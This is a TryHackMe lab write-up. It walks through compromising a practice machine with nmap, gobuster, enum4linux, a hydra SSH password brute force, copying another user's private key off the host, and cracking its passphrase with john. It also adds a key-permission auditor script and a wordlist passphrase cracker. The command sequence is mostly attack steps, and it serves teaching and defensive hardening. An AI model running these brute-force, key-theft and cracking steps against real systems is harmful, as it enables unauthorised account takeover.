tryhackme // 2024-12-30 // ID: REF-Basic Pentesting

Basic Pentesting


Target: 10.201.52.181


Summary

Walkthrough of the TryHackMe Basic Pentesting lab, reconstructed from the commands and outputs recorded during the session. Steps: reconnaissance (nmap, gobuster), SMB enumeration (enum4linux), online password guessing against SSH (hydra), user access as jan (ssh), local enumeration (linpeas), copying out kay's SSH private key, cracking the key passphrase offline with ssh2john + john, and logging in as kay to read pass.bak.


Reconnaissance

Nmap (initial scan)

Command used:

nmap -sC -sV -oN nmap/initials 10.201.52.181

Selected output (truncated):

Nmap scan report for 10.201.52.181
Host is up (0.40s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Notes: SSH (22), HTTP (Apache on 80, Tomcat 9.0.7 on 8080), SMB (139/445) and AJP (8009) are exposed; these are the attack surface to enumerate. The path below goes through the web tree on port 80, SMB user enumeration and SSH; Tomcat and AJP were not needed.


Web enumeration (gobuster)

Command used:

gobuster dir -u http://10.201.52.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Result (found):

/development          (Status: 301) [Size: 320] [--> http://10.201.52.181/development/]

Visiting /development/ revealed two files, dev.txt and j.txt. j.txt indicated that the jan user has a weak password, which is the lead for the hydra run below.


SMB / Windows-like enumeration (enum4linux)

Command used:

./enum4linux.pl -a 10.201.52.181 | tee enum4linux.log

Key findings (from the enum4linux user enumeration): two local accounts, jan and kay.

This confirms the usernames referenced earlier in the web files and gives the login name for the password-guessing step.


Password brute-force (hydra)

Command used:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.201.54.30

Hydra output (relevant line):

[22][ssh] host: 10.201.54.30   login: jan   password: armando

Note: the target address in the hydra output is 10.201.54.30, not the 10.201.52.181 scanned above. The lab machine was most likely redeployed between the recon and exploitation steps (TryHackMe assigns a new address on each deployment); the commands are reproduced as run, so everything from here on uses 10.201.54.30. Result: jan:armando, which was used to SSH in. Hydra itself warns that many sshd configurations cap parallel unauthenticated connections (MaxStartups), so throttling with -t 4 avoids missed attempts on a slow or strict target; that option was not used here.

Login via SSH (example):

ssh jan@10.201.54.30
# password: armando

Local enumeration and finding the SSH key

After SSH'ing in as jan, linpeas was copied over with scp and run for local enumeration. Its output flagged a private key belonging to kay, /home/kay/.ssh/id_rsa, that jan's account can read; the copy saved on the attacking machine was named 0d_rsa in the notes. That readability is the whole privilege escalation here: a key file should be mode 600 inside a mode 700 .ssh directory, so check its permissions before assuming you can copy it.

Steps summarized:

# from attacker machine
scp linpeas.sh jan@10.201.54.30:/tmp/
ssh jan@10.201.54.30
# run linpeas and look for interesting files
# found /home/kay/.ssh/id_rsa (saved locally as 0d_rsa)
scp jan@10.201.54.30:/home/kay/.ssh/id_rsa ./0d_rsa
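The step that matters most above is that jan could read a file in kay's home directory. The following script is an added example, not part of the original write-up or of linpeas: it walks a directory tree for private-key files readable by group or other and reports whether each one is passphrase-protected, which is both the defender's check and what to look for on a fresh foothold before reaching for linpeas. The directory layout, file names and key bodies built by make_fixture are constructed for the demo; on a real host run find_readable_keys against /home.

```bash
#!/bin/sh
# Added example (not part of the original write-up): audit a filesystem tree
# for SSH private keys that other local users can read, the condition that
# let jan copy /home/kay/.ssh/id_rsa.  The directory layout and the key
# files built by make_fixture are constructed for this demo.

# Report whether a key file stores its material in clear or under a passphrase.
key_state() {
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        # openssh-key-v1 blob: magic, NUL, 4-byte length, cipher name.  A
        # cipher of "none" means no passphrase protects the key material.
        if sed '/^-----/d' "$1" | tr -d '\n' | base64 -d 2>/dev/null |
           tr -c '[:print:]' '.' | grep -q '^openssh-key-v1.....none'; then
            echo plain
        else
            echo encrypted
        fi
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo encrypted      # legacy PEM: cipher and IV are in the DEK-Info line
    else
        echo plain
    fi
}

# Print "<mode> <plain|encrypted> <path>" for every regular file under $1
# that carries a "PRIVATE KEY" header and is readable by group or other.
find_readable_keys() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) 2>/dev/null | LC_ALL=C sort |
    while IFS= read -r f; do
        grep -q 'PRIVATE KEY-----' "$f" 2>/dev/null || continue
        mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f")
        printf '%s %s %s\n' "$mode" "$(key_state "$f")" "$f"
    done
}

# Build a throwaway tree with two exposed keys and one properly protected one;
# prints the root directory.  Key bodies are dummies, not real key material.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/home/kay/.ssh" "$root/home/kay/backup" "$root/home/jan/.ssh"
    # Passphrase-protected legacy PEM key left world-readable (like kay's).
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF' '' \
        'ZmFrZS1rZXktbWF0ZXJpYWw=' '-----END RSA PRIVATE KEY-----' \
        > "$root/home/kay/.ssh/id_rsa"
    chmod 644 "$root/home/kay/.ssh/id_rsa"
    # Unencrypted openssh-key-v1 header (cipher "none"), group-readable.
    {
        echo '-----BEGIN OPENSSH PRIVATE KEY-----'
        printf 'openssh-key-v1\000\000\000\000\004none\000\000\000\004none' | base64
        echo '-----END OPENSSH PRIVATE KEY-----'
    } > "$root/home/kay/backup/key.old"
    chmod 640 "$root/home/kay/backup/key.old"
    # Mode 600: not reported even though it is a key.
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'AAAA' \
        '-----END OPENSSH PRIVATE KEY-----' > "$root/home/jan/.ssh/id_ed25519"
    chmod 600 "$root/home/jan/.ssh/id_ed25519"
    printf '%s\n' "$root"
}
```

To see it work on the fixture: root=$(make_fixture); find_readable_keys "$root"; rm -rf "$root". The two exposed files come back with their mode and whether a passphrase stands between a reader and the key; the 600 file is never listed. Reading the cipher name out of the openssh-key-v1 header is the same thing ssh2john does first, and a cipher of "none" means no cracking step at all.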

Cracking the private key passphrase (ssh2john + john)

Convert the private key to a john-compatible hash:

python3 /usr/share/john/ssh2john.py 0d_rsa > id_rsa.hash

Crack with john using rockyou.txt:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

john output (relevant):

beeswax          (0d_rsa)

Passphrase recovered for the SSH private key: beeswax. john records the result in its pot file, so re-running it with --show on the same hash file prints the passphrase again without recracking.
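What ssh2john and john do, stripped to its essence, is try candidate passphrases against the key file offline. The script below is an added example (not the write-up's commands and not john) that does that with ssh-keygen alone: slow, since each guess is a separate process, but it needs no cracking tools, and the same ssh-keygen -y call is how to confirm a passphrase john reports and see which public key it unlocks. The key, its passphrase (beeswax, matching the one recovered above) and the wordlist produced by make_fixture are constructed for the demo.

```bash
#!/bin/sh
# Added example (not part of the original write-up): the ssh2john + john step
# reduced to its essence, a loop that offers each wordlist entry as the key's
# passphrase, using nothing but ssh-keygen.  One process per guess makes it
# far slower than john, but it needs no cracking tools and the same call is
# how you confirm a passphrase john reports.  The key, passphrase and
# wordlist produced by make_fixture are constructed for this demo.

# Try each non-empty line of wordlist $2 against private key $1.
# Prints the passphrase and returns 0 on success; returns 1 if none fit.
crack_passphrase() {
    key=$1; wordlist=$2
    while IFS= read -r cand || [ -n "$cand" ]; do
        [ -n "$cand" ] || continue
        # -y derives the public key, which only works if the passphrase
        # decrypts the file; </dev/null keeps it from falling back to a prompt.
        if ssh-keygen -y -P "$cand" -f "$key" >/dev/null 2>&1 </dev/null; then
            printf '%s\n' "$cand"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Print the public key a passphrase unlocks; compare it with the target
# account's authorized_keys entry before assuming the key gets you in.
verify_passphrase() {
    ssh-keygen -y -P "$2" -f "$1" </dev/null
}

# Create a passphrase-protected test key and a five-word list; prints the dir.
make_fixture() {
    dir=$(mktemp -d)
    # -a 1 uses a single bcrypt KDF round to keep the demo quick.  The default
    # of 16 is why john's rate on modern openssh-key-v1 files is so low.
    ssh-keygen -q -t ed25519 -a 1 -N beeswax -C demo -f "$dir/demo_key" </dev/null
    printf '%s\n' password 123456 letmein beeswax qwerty > "$dir/words.txt"
    printf '%s\n' "$dir"
}

# Stand-alone run: sh thisfile.sh run
demo() {
    d=$(make_fixture)
    crack_passphrase "$d/demo_key" "$d/words.txt" && verify_passphrase "$d/demo_key" beeswax
    rm -rf "$d"
}
if [ "${1:-}" = run ]; then demo; fi
```

Against the real file, crack_passphrase 0d_rsa /usr/share/wordlists/rockyou.txt is correct but orders of magnitude slower than john, so use john to search and this loop (or a single ssh-keygen -y -P beeswax -f 0d_rsa) to confirm. If the public key it prints does not match an entry in the target user's authorized_keys, a cracked passphrase still does not log you in.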


SSH into Kay and capture the flag

Use the private key and the recovered passphrase to SSH to kay's account. ssh refuses a key file that other users can read ("UNPROTECTED PRIVATE KEY FILE"), and a plain scp copy usually lands as 644, so restrict it first:

chmod 600 0d_rsa
ssh -i 0d_rsa kay@10.201.54.30
# when prompted for passphrase: beeswax

Once logged in as kay, read pass.bak in the home directory:

cat pass.bak
-> heresareallystrongpasswordthatfollowsthepasswordpolicy$$

You now have the password string contained in pass.bak (user flag / secret for this box).


Notes & observations

jan's SSH password (armando) is in rockyou.txt and sshd accepts password authentication, so a single hydra run was enough; the hint in j.txt pointed straight at that account.

kay's private key was readable by another local user. Without that, jan's shell would have been the end of the path; the fix is mode 600 on the key and 700 on ~/.ssh.

The key passphrase (beeswax) is also in rockyou.txt. Once the file has been copied off the host the crack is offline and unthrottled, so a key passphrase needs to be as strong as any password.

Tomcat 9.0.7 (8080) and AJP (8009) were exposed but were not needed for this path.

The lab address changed from 10.201.52.181 to 10.201.54.30 part-way through; each command below uses the address that was live when it was run.


Commands summary (copy/paste)

# Recon
nmap -sC -sV -oN nmap/initials 10.201.52.181

gobuster dir -u http://10.201.52.181/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SMB/enum
./enum4linux.pl -a 10.201.52.181 | tee enum4linux.log

# SSH password guessing (as run, against the redeployed address)
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.201.54.30

# After getting jan access
scp linpeas.sh jan@10.201.54.30:/tmp/
ssh jan@10.201.54.30
# find the key and copy it out
scp jan@10.201.54.30:/home/kay/.ssh/id_rsa ./0d_rsa

# Convert and crack private key
python3 /usr/share/john/ssh2john.py 0d_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

# SSH to kay (ssh rejects a key file readable by others)
chmod 600 0d_rsa
ssh -i 0d_rsa kay@10.201.54.30
# passphrase: beeswax
cat pass.bak